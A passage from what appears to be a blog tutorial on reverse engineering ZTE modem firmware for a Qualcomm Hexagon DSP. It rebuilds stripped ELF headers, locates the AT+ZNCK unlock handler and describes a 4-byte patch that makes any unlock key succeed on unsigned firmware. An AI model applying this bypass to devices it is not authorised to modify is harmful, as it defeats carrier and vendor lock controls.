Some more Googling (I’m sure you can see a pattern in how this works now) led me to this. QDSP6 is actually called “Hexagon” by Qualcomm, and they kindly provided an ABI and a programmer’s guide. I guessed from the documents that there is a toolchain, but no more information is provided about it. More searching led me to believe that the in-house toolchain is proprietary, but luckily, there is an open source implementation that is being worked on. Having the toolchain means that we can use “objdump”, the 2nd most popular disassembly tool [Citation Needed]. So, it’s just a matter of sending dsp1.mbn and dsp2.mbn into objdump -d? Nope. It seems that our friends at ZTE either purposely or automatically (as part of the linker) stripped the “section headers” of the ELF file. I did a quick read of the ELF specifications and found that the “section headers” are not required for the program to run, but provide information for linking and such. What we did have was the “program headers”, which are sort of a stripped down version of the section headers. (Program headers only tell: 1) where each “section” is located in the file and where to load it in memory, 2) is it program or data?, 3) readable? writable?, while section headers give more information like the name of each section and more on what the program/data section’s purpose is). What I then did was write my own section headers with a hex editor, using the program headers as a guide and making up the names and other information (because they are not used in the actual disassembling anyways). Then I pasted my headers into the file, changed some offsets, and objdump -d surrendered the assembly code. 180MB worth of it.
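To make the program header part concrete, here is a small Python sketch that reads the program header table out of an ELF image. It assumes a 32-bit little-endian ELF (an assumption about the .mbn files, not something verified here), and the names Segment, read_program_headers, and describe are made up for illustration.

```python
import struct
from collections import namedtuple

# Field order follows the ELF32 program header layout (Elf32_Phdr).
Segment = namedtuple("Segment", "type offset vaddr paddr filesz memsz flags align")

PF_X, PF_W, PF_R = 1, 2, 4  # permission bits in p_flags

def read_program_headers(data):
    """Return the program headers of a 32-bit little-endian ELF image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("this sketch only handles 32-bit little-endian ELF")
    # ELF32 file header: e_ident[16], then the fixed fields (52 bytes total).
    fields = struct.unpack_from("<16sHHIIIIIHHHHHH", data, 0)
    e_phoff, e_phentsize, e_phnum = fields[5], fields[9], fields[10]
    return [
        Segment(*struct.unpack_from("<8I", data, e_phoff + i * e_phentsize))
        for i in range(e_phnum)
    ]

def describe(seg):
    """One line per segment: where it sits in the file, where it loads, rwx."""
    perms = "".join(
        ch if seg.flags & bit else "-"
        for ch, bit in (("r", PF_R), ("w", PF_W), ("x", PF_X))
    )
    return "file 0x%x -> mem 0x%x (%d bytes) %s" % (
        seg.offset, seg.vaddr, seg.filesz, perms)
```

This is exactly the information listed above (file location, load address, permissions), which is why the program headers are enough to hand-write usable section headers.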

Assembly

So we have 180MB worth of code written in a language that could very well be Greek. Luckily, as I’ve mentioned earlier, Qualcomm released a document detailing the QDSP assembly language and how it’s used. Most likely, you would be dealing with a more “popular” processor like ARM or x86 and would have access to more resources. However, for QDSP6/Hexagon, we have two PDF documents and that is basically the Bible that we need to memorize. I then spent a couple of hours learning this new assembly language (assembly isn’t that hard once you embrace it) and figured out the basics needed to reverse engineer (that is: jumps, store/loads, and arithmetic). Now, another problem arises. We have literally 3 million lines of assembly code with no function names, no symbols, and no “sections”. How do we find the goal (the function that checks the NCK key and unlocks the device accordingly) without spending the next two years decoding this mess? Here, we need to make some assumptions. First, we know (through Google) that the AT modem command for inputting the NCK key is AT+ZNCK="keyhere" for ZTE devices. So, let’s look for “ZNCK” in dsp1.mbn and dsp2.mbn with the hex editor. (If you are not as lucky and don’t know what the AT command is, I would put money that the command will contain the word NCK, so just search for that). In dsp2.mbn, we find a couple of results. One of the results is in a group of other AT commands. Each command is next to a 4-byte hex value and a bunch of zero padding. I would guess that it is a jump table and the hex values are the memory locations of the functions to jump to. Doing a quick memory to file offset conversion (from our ELF program header), we locate the offset in our disassembly dump and find that it starts with an “allocframe” instruction. That means we are at the beginning of a function, so our assumptions must be right. Now, we can get to the crux of the problem, which is figuring out how the keycheck works.
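The string search and the memory to file offset conversion are both mechanical, so here is a rough Python sketch of them. Segments are given as (file offset, load address, size in file) tuples taken from the program headers; the function names are hypothetical, and the segment values in the usage note are invented for illustration.

```python
def find_all(data, needle):
    """Return every file offset at which `needle` occurs in `data`."""
    hits = []
    pos = data.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = data.find(needle, pos + 1)
    return hits

def vaddr_to_offset(segments, vaddr):
    """Translate a memory address into a file offset.

    `segments` is a list of (file_offset, load_address, size_in_file)
    tuples, one per loadable program header.
    """
    for file_offset, load_address, size in segments:
        if load_address <= vaddr < load_address + size:
            return file_offset + (vaddr - load_address)
    raise ValueError("address 0x%x is not backed by the file" % vaddr)
```

For example, with a made-up segment (0x1000, 0xf00000, 0x200000), the address 0xf84c54 would translate to file offset 0x85c54. The real numbers have to come from the program headers of the file being examined.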

Mapping out the functions

We now know where the function of interest starts, but we don’t know where it ends. It’s easy to find out though: look for a jump to lr (in this case, for this processor, it’s an instruction to jump to r31). We start at the beginning of the function and we copy all the instructions until we see a non-conditional jump. We paste the data into another text file (for easier reference). Then we go to the next location in the disassembly (where it would have jumped to), copy the instructions until we see another non-conditional jump, and paste them into the second text file. Keep doing this until you see a jump to r31. We now have most of the function. Notice I kept saying “non-conditional” jumps. That’s because first, we just need the code that ALWAYS runs, just to filter out stuff we don’t need. Now, we should get the other branches just so we have more information. To do this, just follow each jump or function call in the same way as we did for the main function. I would also recommend writing some labels like “branch1” and “func1” for each jump just so you can easily locate two jumps to the same location and such. I would also recommend only doing this up to three “levels” max (three function calls or three jumps) because it could get real messy real quick, and we will need more information so we can filter out un-needed code, as I will detail in the next section.
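The copy-until-unconditional-jump procedure can also be written down as a loop. This is only a toy sketch: it assumes the disassembly has already been parsed into a dictionary, that instructions are 4 bytes apart, and that each one has been tagged by hand as "plain", "cond", "jump", or "ret". None of that comes from objdump directly, and the names are made up.

```python
def trace_always_run(listing, start, step=4):
    """Collect the instructions that always run, starting at `start`.

    `listing` maps address -> (text, kind, target) where kind is one of
    "plain", "cond" (conditional jump), "jump" (unconditional jump) or
    "ret" (jump to r31). This representation is an assumption made for
    the sketch.
    """
    path, seen, addr = [], set(), start
    while addr in listing and addr not in seen:
        seen.add(addr)  # guards against looping forever on a cycle
        text, kind, target = listing[addr]
        path.append((addr, text))
        if kind == "ret":
            break              # end of the function
        if kind == "jump":
            addr = target      # follow the unconditional jump
        else:
            addr += step       # plain or conditional: fall through
    return path
```

Conditional jumps are deliberately not followed here. Their targets are the “branches” to come back to afterwards, ideally with a depth limit like the three levels suggested above.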

Finding data references

Right now, we are almost completely blind. All we know is what code is run. We don’t know the names of functions or what they do, and it would take forever to “map” every function and every function that those functions call (and so on). So we need to obtain some information. The best would be to see what data the code is using. For this processor (and likely many others), a “global pointer” is used to refer to some constant data. So, look for references to “gp” in the disassembly. Searching from the very beginning of the program, we find that the global pointer is set to 0x3500000, and according to the ELF headers, that is a section of the dsp2.mbn file at some file offset. In the section we care about, look for references to “gp” and use the offsets you find to locate the data they refer to. I would recommend adding some comments about them in the code so we don’t forget about them. Now, the global pointer isn’t everything; we can also have regular hard-coded pointers to constant areas of memory. Look for registers being set to large numbers. These are likely parameters to function calls that are too big to be just numerical data and are more likely pointers. Use the ELF header to translate the memory locations to file offsets. In this case (for this processor), some values may be split into rS.h and rS.l; these are memory locations that are too “large” to be set in the register at once. Just convert rS.h into a 16 bit integer and rS.l into a 16 bit integer (both might require zero padding in front), then combine them into one 32 bit integer where rS.h’s value is in front of rS.l’s value. For example, we have: r1.h = #384; r1.l = #4624. In hex, those are 0x0180 and 0x1210, which makes r1 == 0x1801210. You should also make some comments in the code about the data that is being used.

Now, predict standard library calls. This may be the hardest step because it involves guessing, and one incorrect guess may make other guesses more wrong. You don’t have much information to go by, but you know 1) the values of some of the data being passed into function calls, 2) that library calls will usually be near the start of the program, or at least very far away from the current function, and 3) some of the more “common” functions and the types of parameters they accept. The second hint will be less useful if the function you are trying to map is already near the beginning of the program. The function I’m mapping is found at 0xf84c54, and most function calls are close to it. When I see a function call to 0xb02760, I know that it might be a library call. You don’t need to figure out all of the library calls, just enough to get an idea of what the code is doing so you don’t try to map out these functions (trying to map out strcpy, for example, will get messy real quick). For example, in one function call, I see it taking in a data pointer from a “gp” offset, a string that contains “%s: %d”, and some more data. I will assume it is calling fprintf(). I see another function being called many times throughout the code, and it always accepts two pointers (where the second one may be a constant) and a number. I will assume it is calling memcpy().
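The rS.h/rS.l arithmetic from the previous section is easy to get wrong by hand, so here is a tiny Python sketch of it, together with the matching calculation for “gp” offsets. The function names are made up; the value 0x3500000 is the global pointer found above.

```python
GP = 0x3500000  # global pointer value found at the start of the program

def combine_halves(high, low):
    """Join the 16-bit immediates loaded into rS.h and rS.l into 32 bits."""
    if not (0 <= high <= 0xFFFF and 0 <= low <= 0xFFFF):
        raise ValueError("each half must fit in 16 bits")
    return (high << 16) | low

def gp_relative(offset, gp=GP):
    """Memory address referred to by a gp-relative access at `offset`."""
    return gp + offset
```

With the example above, hex(combine_halves(384, 4624)) gives '0x1801210'. Either result is a memory address, so it still has to go through the ELF program headers to become a file offset.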

Translating

This may be the most boring part. You should have enough information now to try to write code in a higher level language that does what the assembly code says. I would recommend doing this because it is much easier to see logic this way. I used C and started by doing a “literal” transcription using stuff like “r0-r31” as variable names and using goto. Then go back and try to simplify each section. In my process, I found that the unlock key is checked through a sort of hash function. It takes the user input, passes it through a huge algorithm of and/or/add/sub of more than 1000 lines, and compares the result to a hard coded value in the NV RAM (storage area for the device). Here, I made a choice to not go through and re-code this algorithm for two reasons. First, it would be of little use, as the key check doesn’t use a known value like the IMEI and relies on a hard coded value in the NV RAM that you need to extract (which a regular user might have trouble doing). Second, after decoding it, we would have to do the algorithm backwards to find the key from the “known value” in the NV RAM (and it could be that it would be impossible to work backwards). So I took the easy way out and made a 4-byte patch where I let the program compare the known value to itself instead of to the generated hash from the input, and flashed it to the device. Then I inputted a random key, and the device was unlocked.
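To show why that patch works, here is a toy model of the check in Python. The hash below is a made-up stand-in (the real algorithm is the 1000+ line routine that was never transcribed), and all names are hypothetical.

```python
def toy_hash(key):
    """Stand-in for the real key transform; NOT the device's algorithm."""
    h = 0
    for byte in key.encode("ascii"):
        h = (h * 33 + byte) & 0xFFFFFFFF
    return h

def check_original(user_key, stored_value):
    # Original logic: hash the user's input, compare with the NV RAM value.
    return toy_hash(user_key) == stored_value

def check_patched(user_key, stored_value):
    # Patched logic: the comparison now has the stored value on both
    # sides, so the user's input no longer matters.
    return stored_value == stored_value
```

In this model, check_original only succeeds for a key whose hash matches the stored value, while check_patched succeeds for any input, which matches the “inputted a random key” result above.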

Now, remember at the beginning I said the code was unsigned? Because of that I could easily have reflashed the firmware with my “custom” code. However, if your device has some way of preventing modified code from running, you may have no choice but to decode the algorithm.
